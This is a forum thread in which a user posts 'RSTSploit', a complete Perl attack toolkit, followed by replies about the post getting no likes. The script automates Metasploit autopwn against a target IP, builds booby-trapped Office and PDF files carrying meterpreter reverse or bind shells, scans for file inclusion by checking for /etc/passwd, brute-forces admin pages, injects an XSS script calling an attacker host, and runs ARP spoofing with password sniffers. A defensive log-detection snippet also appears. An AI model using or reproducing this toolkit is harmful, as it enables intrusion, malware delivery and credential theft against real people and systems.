darkston3e

[RST] RSTSPLOIT v1.0


Posted (edited)

This tool uses 0day metasploit vulnerabilities ( plugins / modules ) made specially for RSTCENTER.COM coded in perl.

Recommended: Use it on Backtrack 5, or RC1 *or higher* for best results.

http://code.google.com/p/rstsploit/downloads/list ( contains the rest of the files )

Pass for rar: rstcenter.com

#!/usr/bin/perl
# --------------------------------------------------
# RSTSploit ToolKit
# --------------------------------------------------
# Copyright (C) <2012> <DarkStone>
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
#
#
# RSTSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability
# RSTsploit Toolkit Version 1.0
#
# Description :
#
# [+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
# [+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
# [+]format infector - inject reverse & bind payload into file format
# [+]phpmyadmin - Search Target phpmyadmin login page
# [+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
# [+]apache users - search server username directory (if use from apache webserver)
# [+]Dir Bruter - brute target directory with wordlist
# [+]admin finder - search admin & login page of target
# [+]MLITM,XSS Phishing - Man Left In The Middle Attack
# [+]MITM - Man In The Middle Attack
#
# About Author :
#
# Founder : DarkStone
# Email : darkston3e@yahoo.com
# Thanks To : Hippi & Cr0w for helping
#
use Term::ANSIColor qw(:constants);
use HTTP::Request;
use LWP::UserAgent;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
$header = int rand (6);
open (HDR, "hdr//$header.wsf");
@RHDR=<HDR>;
$email = 'darkston3e@yahoo.com';
print GREEN, "@RHDR", RESET;
print "\n\n";
print CYAN ")=-=-=-=[ RSTSploit Toolkit Version 1.0\n", RESET;
print CYAN ")=-=-=-=[ Report Bug : $email\n", RESET;
print "\n\n";
print "\tID & Name\t\t Description\n";
print "\t------------\t\t--------------\n";
print "\t[1]AutoPWN\t\t Scan,Detect Target Service's And Exploit Automated\n";
print "\t[2]Wmap\t\t\t Crawler,Scan Target Web Service\n";
print "\t[3]Format Infector\t Inject Custom Payload Into File Formats\n";
print "\t[4]PHPMyAdmin\t\t Scan PHPMyAdmin Page\n";
print "\t[5]LFI\t\t\t Scan Local File Inclusion Vulnerability\n";
print "\t[6]Apache User\t\t Scan Apache User's Directory\n";
print "\t[7]Dir Bruter\t\t Brute Force Directory Of Target Site\n";
print "\t[8]Admin Finder\t\t Scan Target Admin Page\n";
print "\t[9]MLITM Attack\t\t Man Left In The Middle, XSS Phishing Attack\n";
print "\t[10]MITM Attack\t\t Man In The Middle Attack\n";
print "\n";
print CYAN, UNDERLINE "wsf", RESET;
print " > ";
$selector = <STDIN>;
chomp ($selector);
if ($selector ==1){&autopwn}
if ($selector ==2){&wmap}
if ($selector ==3){&infector}
if ($selector ==4){&phpmyadmin}
if ($selector ==5){&lfi}
if ($selector ==6){&apache}
if ($selector ==7){&DBR}
if ($selector ==8){&admin}
if ($selector ==9){&MLITM}
if ($selector ==10){&MITM}
sub autopwn {
print "\n";
print YELLOW, BOLD "[*]Scan Target Service's With NMAP\n", RESET;
print YELLOW, BOLD "[*]Detect Target Service's Via Open Ports\n", RESET;
print YELLOW, BOLD "[*]Launch All Exploit ...\n", RESET;
print RED, BOLD, UNDERLINE "[*]Use From Bind Payload,So Not Need To The Valid IP Address\n\n", RESET;
print CYAN, UNDERLINE "wsf:Autopwn", RESET;
print " > Enter Target IP Address : ";
$target_ip = <STDIN>;
chomp ($target_ip);
print BLUE, BOLD "[*]Your Target => $target_ip\n";
print "[*]Engine Started ...\n", RESET;
if (-e "tmp//rstsploit_autopwn.rc"){system ("rm -rf tmp//rstsploit_autopwn.rc")}
open (APF, ">>tmp//rstsploit_autopwn.rc");
print APF "workspace -d rstsploit\n";
print APF "workspace -a rstsploit\n";
print APF "db_nmap $target_ip\n";
print APF "db_autopwn -t -x -p -e\n";
close (APF);
system ("msfconsole -r tmp//rstsploit_autopwn.rc");
exit;

}
sub wmap {
print "\n";
print YELLOW, BOLD "[*]Scan WebServer & Version Of Target\n";
print "[*]Crawler Target WebSite\n";
print "[*]Scan Webdav & etc About Target Server & Site\n\n", RESET;
print CYAN, UNDERLINE "wsf:Wmap", RESET;
print " > Enter Your Target IP Address : ";
$target_ip = <STDIN>;
chomp ($target_ip);
print BLUE, BOLD "[*]Your Target IP => $target_ip\n";
print "[*]Engine Started ...\n", RESET;
sleep (2);
if (-e "tmp//rstsploit_wmap.rc"){system ("rm -rf tmp//rstsploit_wmap.rc")}
open (WMS, ">>tmp//rstsploit_wmap.rc");
print WMS "workspace -d rstsploit-wmap\n";
print WMS "workspace -a rstsploit-wmap\n";
print WMS "load wmap\n";
print WMS "sleep 3\n";
print WMS "wmap_targets -c\n";
print WMS "wmap_sites -a $target_ip\n";
print WMS "wmap_targets -t $target_ip\n";
print WMS "wmap_run -t\n";
print WMS "sleep 3\n";
print WMS "wmap_run -e\n";
close (WMS);
system ("msfconsole -r tmp//rstsploit_wmap.rc");
exit;
}
sub infector {
print "\n";
print "\tID & Format\t\t Description\n";
print "\t------------\t\t--------------\n";
print "\t[1]PDF\t\t\t Adobe Flash Player [newfunction] Invalid Pointer Use\n";
print "\t[2]RTF\t\t\t Microsoft Word RTF [pFragments] Stack Buffer Overflow\n";
print "\t[3]PPT\t\t\t Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow\n";
print "\t[4]XLS\t\t\t Microsoft Excel Malformed FEATHEADER Record Vulnerability\n";
print "\t[5]VBP\t\t\t Microsoft Visual Basic VBP Buffer Overflow\n";
print "\t[6]EPS\t\t\t Adobe Illustrator CS4 v14.0.0\n";
print "\n";
print CYAN, UNDERLINE "wsf:Infector", RESET;
print " > Enter The ID Of Format : ";
$selector_2 = <STDIN>;
chomp ($selector_2);
if ($selector_2 ==1){$expl_name = "exploit/windows/fileformat/adobe_flashplayer_newfunction"}
if ($selector_2 ==2){$expl_name = "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof"}
if ($selector_2 ==3){$expl_name = "exploit/windows/fileformat/ms10_004_textbytesatom"}
if ($selector_2 ==4){$expl_name = "exploit/windows/fileformat/ms09_067_excel_featheader"}
if ($selector_2 ==5){$expl_name = "exploit/windows/fileformat/ms_visual_basic_vbp"}
if ($selector_2 ==6){$expl_name = "exploit/windows/fileformat/adobe_illustrator_v14_eps"}
print "\n";
print CYAN, UNDERLINE "wsf:Infector", RESET;
print " > Enter Your IP Address (Use In Reverse Payload) : ";
$ourip = <STDIN>;
chomp ($ourip);
print "\n";
print "\tID & Payload\t\t Description\n";
print "\t------------\t\t--------------\n";
print "\t[1]Bind TCP\t\t Windows Meterpreter (Reflective Injection), Bind TCP Stager\n";
print "\t[2]Reverse TCP\t\t Windows Meterpreter (Reflective Injection), Reverse TCP Stager\n";
print "\t[3]DLL,Reverse\t\t Reflective Dll Injection, Reverse TCP Stager\n";
print "\t[4]DLL,Bind\t\t Reflective Dll Injection, Bind TCP Stager\n";
print "\n";
print CYAN, UNDERLINE "wsf:Infector", RESET;
print " > Select Payload : ";
$selector_3 = <STDIN>;
chomp ($selector_3);
if ($selector_3 ==1){$payload_name = "PAYLOAD=windows/meterpreter/bind_tcp"}
if ($selector_3 ==2){$payload_name = "PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourip"}
if ($selector_3 ==3){$payload_name = "PAYLOAD=windows/dllinject/reverse_tcp LHOST=$ourip"}
if ($selector_3 ==4){$payload_name = "PAYLOAD=windows/dllinject/bind_tcp"}


print "\n";
print "[!]-------[Information]-------[!]\n";
print "[!] Exploit : $expl_name\n";
print "[!] Payload : $payload_name\n";
print "[!] Location: /root/.msf4/data/exploits\n";
print "[!]---------------------------[!]\n";
print "\n";
sleep (1);
system ("msfcli $expl_name $payload_name E");
print "\n";
print GREEN, BOLD "[*] Do You Want To Create Listener ? <y/n> : ", RESET;
$les=<STDIN>;
chomp ($les);
if ($les =~ /y/){
system ("msfcli exploit/multi/handler $payload_name E");
}
else {
print YELLOW, BOLD "[*]Thank You For Using rstsploit,Have Nice Time\n";
print "[*]Bye Bye\n", RESET;
}
}
sub phpmyadmin {
$res_code = "200";
print "\n";
print YELLOW, BOLD "[*]PHPMyAdmin Login Page Finder\n";
print "[*]Enter Target Address (ex : http://site.com)\n\n", RESET;
print CYAN, UNDERLINE "wsf:PHPMyAdmin", RESET;
print " > Enter Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print GREEN, BOLD "[*]Loading List ...\n", RESET;
sleep (2);
print GREEN, BOLD "[*]Scanning ...\n", RESET;
open (PHPMYADMIN, "<scr//phpmyadmin.csv") or die "[-]Error,Can't Found 'phpmyadmin.csv' File!\n";
while (<PHPMYADMIN>){
$path = $_;
chomp ($path);
$url=$target_add.$path;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success($res_code)){
print GREEN "[+] [FOUND] ..... $path\n", RESET;
}
else {print RED "[-] [ERROR] ..... $path\n", RESET;}
}
close(PHPMYADMIN);
print "\n";
print "DONE.\n";
}
sub lfi {
print "\n";
print YELLOW, BOLD "[*]Scan Local File Inclusion Vulnerability On Your Target\n";
print "[*]Can Be Bypass Some Web Application Firewall (WAF)\n";
print "[*]Enter Target (ex : http://site.com/index.php?page=)\n", RESET;
print CYAN, UNDERLINE "wsf:LFI", RESET;
print " > Enter Your Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print "\n";
print YELLOW, BOLD "[*]Engine Started ...\n", RESET;
sleep (2);
print YELLOW, BOLD "[+]Scanning ...\n", RESET;
print "\n";
open (LFI, "<scr//lfi.csv") or die "[-]Error,Can't Found 'lfi.csv' File!\n";
while (<LFI>){
$try = $_;
chomp ($try);
$url=$target_add.$try;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/){
print GREEN, BOLD "[+] [FOUND] $try\n", RESET;
}
else {
print "";
}


}
close (LFI);
print "\n";
print YELLOW, BOLD "[*]DONE.\n", RESET;
}
sub apache {
$res_code = "200";
print "\n";
print YELLOW, BOLD "[!]Brute Apache Directory Of Users\n";
print "[!]Enter Target (ex : http://site.com)\n", RESET;
print CYAN, UNDERLINE "wsf:Apache", RESET;
print " > Enter Your Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print YELLOW, BOLD "[*]Loading Users List ...\n", RESET;
sleep (2);
print YELLOW, BOLD "[*]Engine Started ...\n";
print "[*]Scanning ...\n", RESET;
open (APACHE, "<scr//apache.csv") or die "[-]Error, Can't Found 'apache.csv' File!\n";
while (<APACHE>){
$user = $_;
chomp ($user);
$url=$target_add.$user;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success($res_code)){
print GREEN, BOLD "[+][FOUND] ... $url\n", RESET;
}
else {print "";}

}
close (APACHE);
print "\n";
print YELLOW, BOLD "[*]DONE.\n", RESET;
}
sub DBR {
$code="2xx";
print "\n";
print YELLOW, BOLD "[*]Brute Target Directory With WordList\n";
print "[*]Enter Target Address (ex : http://site.com/)\n\n", RESET;
print CYAN, UNDERLINE "wsf:DirBruter", RESET;
print " > Enter Your Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print BLUE, BOLD "\n[*]Loading WordList ...\n";
sleep (2);
print "[*]Engine Started ...\n";
print "[*]Scanning ...\n", RESET;
print "\n";
open (WORDLIST, "<scr//DBR.csv") or die "[-]Error,Can't Found 'DBR.csv' File!\n";
while (<WORDLIST>){
$wl=$_;
chomp ($wl);
$slash="/";
$url = $target_add.$slash.$wl;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success($code)){
print GREEN "[+] [FOUND] ... $url\n", RESET;
}
else {print RED "[-] [ERROR] ... $url\n", RESET;}
}
close (WORDLIST);
print "\n";
print YELLOW, BOLD "[*]DONE.\n";
}
sub admin {
$res_code="200";

print YELLOW, BOLD "[*]Scan Admin/Login Page Of Your Target\n";
print "[*]Enter Target Address (ex : http://site.com)\n", RESET;
print CYAN, UNDERLINE "wsf:AdminFinder", RESET;
print " > Enter Your Target Address : ";
$target_add = <STDIN>;
chomp ($target_add);
print BLUE, BOLD "[*]Loading Admin Page Name List ...\n";
sleep (2);
print "[!]Engine Started ...\n";
print "[!]Scanning ...\n", RESET;
print "\n";
open (ADMINS, "<scr//admins.csv") or die "[-]Error,Can't Found 'admins.csv' File!\n";
while (<ADMINS>){
$adminpath=$_;
chomp ($adminpath);
$url = $target_add.$adminpath;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success($res_code)){
print GREEN "[+] [FOUND] ... $url\n", RESET;
}
else {print RED "[-] [ERROR] ... $url\n", RESET;}
}
close (ADMINS);
print "\n";
print YELLOW, BOLD "[*]DONE.\n", RESET;

}
sub MLITM {
print "\n";
print RED BOLD "[*]Written by DarkStone\n";
print '[*]darkston3e@yahoo.com';
print "\n";
print YELLOW BOLD "[*]This is not an exploit tool, it's a payload tool.\n";
print "[*]Once you've found the exloit, and you're able to inject javascript,\n";
print "[*]just stick this in there as a script.\n";
print '[*]<script src="http://YOURIP/">', RESET;
print "\n";
print BLUE BOLD "[*]Stoping Web Server ... ", RESET;
system ("xterm -e service apache2 stop");
sleep (2);
print BLUE BOLD "OK\n", RESET;
print "\n";
print CYAN UNDERLINE "wsf:MLITM", RESET;
print " > Press [ENTER] For Start XSS Phishing Attack : ";
$enter = <STDIN>;
system ("python scr//thebiz.py");
}
sub MITM {
print "\n";
print YELLOW BOLD "[*]Man In The Middle Attack\n", RESET;
print YELLOW BOLD "[*]Sniff Victim Information In Your Network\n", RESET;
print YELLOW BOLD "[*]Enter Interface Name (ex : eth0 ,eth1 ,wlan0)\n", RESET;
print CYAN UNDERLINE "wsf:MITM", RESET;
print " > Enter Interface Name : ";
$interface_name = <STDIN>;
chomp ($interface_name);
print CYAN UNDERLINE "wsf:MITM", RESET;
print " > Enter Router IP Address : ";
$router_ip = <STDIN>;
chomp ($router_ip);
print CYAN UNDERLINE "wsf:MITM", RESET;
print " > Enter Target IP Address : ";
$target_ip = <STDIN>;
chomp ($target_ip);
print "\n";
print "\tSniffers\t\t Description\n";
print "\t------------\t\t--------------\n";
print "\t[1]DSniffer\t\t Sniff All Passwords\n";
print "\t[2]Msgsnarf\t\t Sniff All Text Of Victim Messengers\n";
print "\t[3]Urlsnarf\t\t Sniff Victim Links\n";
print "\t[4]Driftnet\t\t Sniff Victim Images\n";
print "\n";
print CYAN UNDERLINE "msf:MITM", RESET;
print " > Enter Selected Sniffer ID : ";
$sniff_selector = <STDIN>;
chomp ($sniff_selector);
if ($sniff_selector ==1){$selected_sniffer="dsniff -i $interface_name"}
if ($sniff_selector ==2){$selected_sniffer="msgsnarf -i $interface_name"}
if ($sniff_selector ==3){$selected_sniffer="urlsnarf -i $interface_name"}
if ($sniff_selector ==4){$selected_sniffer="driftnet -i $interface_name"}
# ip forwarding section
print "\n";
print BLUE BOLD "[*]IP Forwarding ... ", RESET;
$p_forwarding = 'xterm -T "RSTSploit - Port Forwarding ..." -e "echo 1 > /proc/sys/net/ipv4/ip_forward"';
system ("$p_forwarding");
sleep (2);
print BLUE BOLD "OK\n", RESET;
print BLUE BOLD "[*]ARP Spoofing ... ", RESET;
$arp_spoofing1 = "xterm -e arpspoof -i $interface_name -t $target_ip $router_ip &";
$arp_spoofing2 = "xterm -e arpspoof -i $interface_name -t $router_ip $target_ip &";
print BLUE BOLD "OK\n", RESET;
system ("$arp_spoofing1");
sleep (1);
system ("$arp_spoofing2");
sleep (1);
system ("$selected_sniffer");


}

#
# RSTsploit Toolkit Version 1.0
# Written By DarkStone
# RSTSploit Project : https://www.rstcenter.com

Edited by darkston3e
Google code added
  • Upvote 1
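
A defender-side view of the HTTP modules in the script above (phpmyadmin, lfi, apache, DBR, admin), as an added example that is not part of the original post or of the RSTSploit project: each module walks a wordlist with a fresh `LWP::UserAgent->new()`, so requests carry the default `libwww-perl/<version>` User-Agent and mostly miss. The log lines, thresholds and rule names below are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed access-log lines in "combined" format (sample data, not from the page).
SAMPLE_LOG = '''\
203.0.113.7 - - [01/Jan/2012:10:00:01 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "libwww-perl/6.03"
203.0.113.7 - - [01/Jan/2012:10:00:01 +0000] "GET /administrator/ HTTP/1.1" 404 210 "-" "libwww-perl/6.03"
203.0.113.7 - - [01/Jan/2012:10:00:02 +0000] "GET /login.php HTTP/1.1" 200 1532 "-" "libwww-perl/6.03"
203.0.113.7 - - [01/Jan/2012:10:00:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "libwww-perl/6.03"
203.0.113.7 - - [01/Jan/2012:10:00:03 +0000] "GET /pma/ HTTP/1.1" 404 210 "-" "libwww-perl/6.03"
203.0.113.7 - - [01/Jan/2012:10:00:03 +0000] "GET /~root/ HTTP/1.1" 403 199 "-" "libwww-perl/6.03"
203.0.113.9 - - [01/Jan/2012:10:05:00 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 912 "-" "Mozilla/5.0"
198.51.100.20 - - [01/Jan/2012:10:06:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [01/Jan/2012:10:06:01 +0000] "GET /favicon.ico HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.30 - - [01/Jan/2012:10:07:00 +0000] "GET /health HTTP/1.1" 200 2 "-" "libwww-perl/6.03"
'''

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Generic traversal markers; the script's own lfi.csv wordlist is not on the page.
TRAVERSAL_RE = re.compile(r'\.\./|\.\.%2f|%2e%2e|/etc/passwd', re.I)

def find_scanners(log_text, min_misses=5, miss_ratio=0.8):
    """Return {client_ip: [rule names]} for clients that behave like the scanners."""
    stats = defaultdict(lambda: {"total": 0, "miss": 0, "lfi": 0, "lwp": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        s = stats[m["ip"]]
        s["total"] += 1
        s["miss"] += m["status"].startswith("4")   # anything the scanner treats as a miss
        s["lfi"] += bool(TRAVERSAL_RE.search(m["path"]))
        s["lwp"] |= m["ua"].startswith("libwww-perl/")
    findings = {}
    for ip, s in stats.items():
        rules = []
        if s["miss"] >= min_misses and s["miss"] / s["total"] >= miss_ratio:
            rules.append("wordlist-enumeration")
        if s["lfi"]:
            rules.append("lfi-probe")
        # The User-Agent is easily changed and is also sent by benign LWP scripts,
        # so it only corroborates a behavioural rule and never fires alone.
        if rules and s["lwp"]:
            rules.append("default-lwp-agent")
        if rules:
            findings[ip] = rules
    return findings
```

The benign monitoring client at 198.51.100.30 uses the same User-Agent but produces no finding, which is why the behavioural rules carry the detection.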
Posted

This is the last release I'm doing for RST.

Not even 1 like, not even 1 comment (it makes no sense).

People have forgotten how to show appreciation; I have tried several times, and instead of thanks I got nothing but flames.

Posted (edited)

Be patient; in the 10 hours from this morning until now, who do you think has had the chance to see or test something like this?

Anyway, I more or less like how you organized the code, although the readability could have used a bit more work, but it looks much better than most of the things that get posted around here.

Relax, I too have many Python posts that didn't get an ounce of attention, or for which I really worked hard on certain things, while a few crappy scripts that I put up just like that, only to make one more thread to help someone with something, have far more views and likes; but I'm not going to play the hypocrite and say it bothers me, I just leave the post there so it can help whoever is searching and needs it. I realized this long ago and I don't regret any effort, because in everything I did there was also a personal interest, and this "practice" really helped me.

So, before you say what you said above, think again and start from a "foundation" based on the idea that everything you do, you do for yourself, not for others, not for RST, and no effort is in vain.

Edited by cmiN
Posted

I'm at work and I couldn't look over it to give my opinion; stop behaving childishly, like an "attention whore".

The code is nicely organized, but I don't have time to read it to see exactly what it's about; I'll take a look tonight.

Posted

@cmiN;

Good point..

@Nytro;

Ok, I apologize, I was a bit cranky when I woke up and didn't see even 1 like or a comment (but now I realize that not very many people use such creations because it's beyond them).

P.S: This script is not for dummies :)
